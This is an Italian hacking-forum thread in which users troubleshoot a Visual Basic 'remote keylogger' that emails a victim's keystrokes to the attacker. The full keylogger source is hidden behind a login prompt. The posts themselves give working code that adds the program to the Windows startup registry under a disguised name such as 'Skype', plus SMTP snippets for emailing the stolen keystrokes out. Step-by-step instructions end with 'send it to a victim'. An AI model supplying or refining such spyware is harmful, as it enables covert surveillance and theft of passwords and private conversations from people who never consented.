• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida Come creare un Keylogger REMOTO

Riferimento: Come creare un Keylogger REMOTO

ciao a tutti
scusate l'ignoranza, ma non ho ben capito come creare questo keylogger (sono alle prime armi >.<)

se ho capito bene devo mettere la mia Mail in:
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

dove ho scritto QUI! dovrei mettere la mail giusto?
io uso live. ho fatto una prova e arrivato a 500 caratteri circa mi da l'errore di invio e mi da un errore nella riga "dim mail as new message.." se nn sbaglio. coas ho sbagliato? o meglio, cosa devo modificare??? grazie a chi mi aiuterà
 
Riferimento: Come creare un Keylogger REMOTO

risolto grazie lo stesso. non so xke ma ora invia le mail normalmente...
c'è un codice per farlo avviare con windows?
 
Riferimento: Come creare un Keylogger REMOTO

Certo:
Dim nome As String = "Skype"
Dim path As String
path = Application.ExecutablePath.ToString
Dim registry As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser
Dim key As Microsoft.Win32.RegistryKey = registry.OpenSubKey("software\microsoft\windows\currentversion\run", True)
key.SetValue(nome, path, Microsoft.Win32.RegistryValueKind.String)
'Alla prima riga metti tra le virgolette il nome che vuoi tu per camuffare l'avvio.
 
Riferimento: Come creare un Keylogger REMOTO

ho copiato il codice e ho sostituito "skipe" con il nome che volevo ma non va.. forse ho sbagliato qualcosa:
ho messo il codice nella procedura di caricamento del Form (Form1_load), compilo il programma, vado in "C:\Documents and Settings\Daniele\Documenti\Visual Studio 2010\Projects\MIOPROGGETTO\MIOPROGGETTO\bin\Debug" avvio il debug (MIOPROGRAMMA.exe) ma al riavvio del Pc nn me lo fa partire.
non parte xke ho fatto partire il MIOPROGRAMMA.exe dalla cartella debug? help pls
 
Riferimento: Come creare un Keylogger REMOTO

ma questo keylogger genera poi un file da inviare via e-mail, e alla fine, manda le battute effettuate su un'altro pc ( infettato ).
Oppure va installato volontariamente su di un pc, e manda via e-mai le battute fatte su quel pc per comodità ??

Grazie ciao !!
 
Riferimento: Come creare un Keylogger REMOTO

ma questo keylogger genera poi un file da inviare via e-mail, e alla fine, manda le battute effettuate su un'altro pc ( infettato ).
Oppure va installato volontariamente su di un pc, e manda via e-mai le battute fatte su quel pc per comodità ??

Grazie ciao !!

???? :shock:
Praticamente, lo devi installare sul computer della vittima, poi lui lo apre, e ogni 500 caratteri che dici, ad esempio in chat, ti arriva un email a te, con tutti i tasti premuti.
 
Riferimento: Come creare un Keylogger REMOTO

Mentre nelle righe:

smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("QUI!", "QUI LA PASSWORD!")

devo impostare un server di posta in uscita ??
poi questo per farlo eseguire alla vittima devo compilarlo con visual studio ??

Ancora una cosa, cosa devo mettere in queste righe ?
mail.From = New MailAddress("QUI!")
mail.To.Add("QUI!")

Grazie per l'aiuto !
 
Riferimento: Come creare un Keylogger REMOTO

Ciao, inserendo questo keylogger su visual basic ho riscontrato le seguenti problematiche quando ho tentato di pubblicare il mio progetto:


Errore 1 Impossibile trovare 'Sub Main' in 'pdf.Module1'. pdf

Errore 2 Impossibile trovare l'evento 'Load'. C:\Users\Sapessi\AppData\Local\Temporary Projects\pdf\Module1.vb 6 103 pdf

Errore 3 'Visible' non è un membro di 'pdf.TaskHost'. C:\Users\Sapessi\AppData\Local\Temporary Projects\pdf\Module1.vb 7 9 pdf

Errore 4 'Timer1' non dichiarato. Non è accessibile a causa del livello di protezione. C:\Users\Sapessi\AppData\Local\Temporary Projects\pdf\Module1.vb 8 9 pdf

Errore 5 La clausola Handles richiede una variabile WithEvents definita nel tipo che la contiene o in uno dei suoi tipi di base. C:\Users\Sapessi\AppData\Local\Temporary Projects\pdf\Module1.vb 10 97 pdf

Errore 6 'Visible' non è un membro di 'pdf.TaskHost'. C:\Users\Sapessi\AppData\Local\Temporary Projects\pdf\Module1.vb 11 9 pdf

Errore 7 Tipo 'System.Windows.Forms.Keys' non definito. C:\Users\Sapessi\AppData\Local\Temporary Projects\pdf\Module1.vb 17 36 pdf

Errore 8 'TextBox1' non dichiarato. Non è accessibile a causa del livello di protezione. C:\Users\Sapessi\AppData\Local\Temporary
Projects\pdf\Module1.vb 29 17 pdf


Errore 9 'TextBox1' non dichiarato. Non è accessibile a causa del livello di protezione. C:\Users\Sapessi\AppData\Local\Temporary Projects\pdf\Module1.vb 29 33 pdf


Errore 10 'TextBox1' non dichiarato. Non è accessibile a causa del livello di protezione. C:\Users\Sapessi\AppData\Local\Temporary Projects\pdf\Module1.vb 30 20 pdf

Errore 11 'Label4' non dichiarato. Non è accessibile a causa del livello di protezione. C:\Users\Sapessi\AppData\Local\Temporary Projects\pdf\Module1.vb 40 112 pdf

Errore 12 'TextBox1' non dichiarato. Non è accessibile a causa del livello di protezione. C:\Users\Sapessi\AppData\Local\Temporary Projects\pdf\Module1.vb 41 33 pdf

Errore 13 'Label4' non dichiarato. Non è accessibile a causa del livello di protezione. C:\Users\Sapessi\AppData\Local\Temporary Projects\pdf\Module1.vb 44 21 pdf

Errore 14 'textbox1' non dichiarato. Non è accessibile a causa del livello di protezione. C:\Users\Sapessi\AppData\Local\Temporary Projects\pdf\Module1.vb 45 21 pdf

Errore 15 'Label1' non dichiarato. Non è accessibile a causa del livello di protezione. C:\Users\Sapessi\AppData\Local\Temporary Projects\pdf\Module1.vb 49 9 pdf

Errore 16 'TextBox1' non dichiarato. Non è accessibile a causa del livello di protezione. C:\Users\Sapessi\AppData\Local\Temporary Projects\pdf\Module1.vb 49 23 pdf


PREMETTO che il progetto si chiama pdf
io ho settato i parametri della e-mail richiesti all'interno del kelogger ma tutti questi problemi ??!!!! qualcuno saprebbe darmi una mano, sono nuovo in visual basic

Grazie dell'aiuto !!!!
 
Riferimento: Come creare un Keylogger REMOTO

Devi fare un windows form e quando dice non dichiarato significa che non hai messo la textbox dalla casella degli strumenti...
 
Riferimento: Come creare un Keylogger REMOTO

Una volta finito il progetto che devo fare? come si invia? potresti postare una guida con un video o screen? :S

Mi da questi Errori che devo fare?

Perfavore, Entra oppure Registrati per vedere i Link!
 
Ultima modifica:
Riferimento: Come creare un Keylogger REMOTO

Anche a me ha dato quegli errori...ma non so per quale motivo...speriamo risponda qualche buona anima....
 
Riferimento: Come creare un Keylogger REMOTO

qlc che fa qlc screen pls x noi nabbi:emoji_confused:
 
Riferimento: Come creare un Keylogger REMOTO

A me da tutti quegli errori che non dichiaro ma le ho messe le textbox e i label
 
Ultima modifica:
Riferimento: Come creare un Keylogger REMOTO

A me da tutti quegli errori che non dichiaro ma le ho messe le textbox e i label

@strunz1
@enomis232
@Davex92
@Tonyo

Allora ecco che cosa dovete fare (SEGUITE I PASSAGGI SENZA FARE NIENTE DI PIù):

1) Create un nuovo progetto windows form.
2) Inserite sul form, 4 label, 1 textbox e 1 timer.
3) Passate alla parte del codice.
4) Cancellate tutto il codice.
5) Incollate il seguente codice:

Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

6) Modificate: "TUA EMAIL", "TUA PASSWORD", la porta smtp e il host (solo se non avete un email live.com, trovate tutte le porte e i host su google).
7) Avete finito, non dovrebbero esserci errori.
8) Compilate il keylogger, inviatelo a una vittima.

P.S. potrebbe uscirvi un errore con scritto "Accesso negato.......C:\Windows\DriverSys.txt...", in questo caso dovete cambiare il percorso "C:\Windows\DriverSys.txt" (nel codice), in "D:\Driversys.txt".
 
Ultima modifica da un moderatore:
Riferimento: Come creare un Keylogger REMOTO

@strunz1
@enomis232
@Davex92
@Tonyo

Allora ecco che cosa dovete fare (SEGUITE I PASSAGGI SENZA FARE NIENTE DI PIù):

1) Create un nuovo progetto windows form.
2) Inserite sul form, 4 label, 1 textbox e 1 timer.
3) Passate alla parte del codice.
4) Cancellate tutto il codice.
5) Incollate il seguente codice:

Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

6) Modificate: "TUA EMAIL", "TUA PASSWORD", la porta smtp e il host (solo se non avete un email live.com, trovate tutte le porte e i host su google).
7) Avete finito, non dovrebbero esserci errori.
8) Compilate il keylogger, inviatelo a una vittima.

P.S. potrebbe uscirvi un errore con scritto "Accesso negato.......C:\Windows\DriverSys.txt...", in questo caso dovete cambiare il percorso "C:\Windows\DriverSys.txt" (nel codice), in "D:\Driversys.txt".


Grazie , adesso non mi da errori.

Comunque dopo che ho compilato , ho aperto il programma per provarlo e si è tolto dopo 1 secondo. Poi ho provato a scrivere 250 caratteri (Ho cambiato da 500 a 250) ma non mi è arrivata nessuna mail . è Questo il procedimento che si deve fare per mandare le email????

Mi spieghi meglio grz.

come smpt ho messo smtp.gmail.com port 587
 
Ultima modifica:
Riferimento: Come creare un Keylogger REMOTO

Non mi interessa :emoji_slight_smile: ho Keylogger in C++ Migliori :emoji_slight_smile:
@strunz1
@enomis232
@Davex92
@Tonyo

Allora ecco che cosa dovete fare (SEGUITE I PASSAGGI SENZA FARE NIENTE DI PIù):

1) Create un nuovo progetto windows form.
2) Inserite sul form, 4 label, 1 textbox e 1 timer.
3) Passate alla parte del codice.
4) Cancellate tutto il codice.
5) Incollate il seguente codice:

Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

6) Modificate: "TUA EMAIL", "TUA PASSWORD", la porta smtp e il host (solo se non avete un email live.com, trovate tutte le porte e i host su google).
7) Avete finito, non dovrebbero esserci errori.
8) Compilate il keylogger, inviatelo a una vittima.

P.S. potrebbe uscirvi un errore con scritto "Accesso negato.......C:\Windows\DriverSys.txt...", in questo caso dovete cambiare il percorso "C:\Windows\DriverSys.txt" (nel codice), in "D:\Driversys.txt".